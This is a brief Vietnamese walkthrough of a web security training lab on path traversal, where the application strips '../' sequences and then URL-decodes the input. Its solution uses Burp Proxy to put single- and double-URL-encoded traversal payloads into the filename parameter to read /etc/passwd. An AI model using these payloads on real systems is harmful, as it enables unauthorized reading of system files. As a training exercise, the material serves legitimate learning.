Lab: File path traversal, traversal sequences stripped with superfluous URL-decode

Mô tả

Phòng thí nghiệm này chứa lỗ hổng path traversal trong việc hiển thị hình ảnh sản phẩm.

Ứng dụng chặn đầu vào chứa chuỗi duyệt đường dẫn. Sau đó thực hiện URL-decode đầu vào trước khi sử dụng.

Mục tiêu: Lấy nội dung tệp /etc/passwd

Giải pháp

Sử dụng Burp Proxy để chặn và sửa đổi yêu cầu lấy hình ảnh sản phẩm.

Mục tiêu là để ứng dụng duyệt đường dẫn: ../../../etc/passwd

Sửa đổi tham số filename:

1 lần encode: %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

2 lần encode: %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd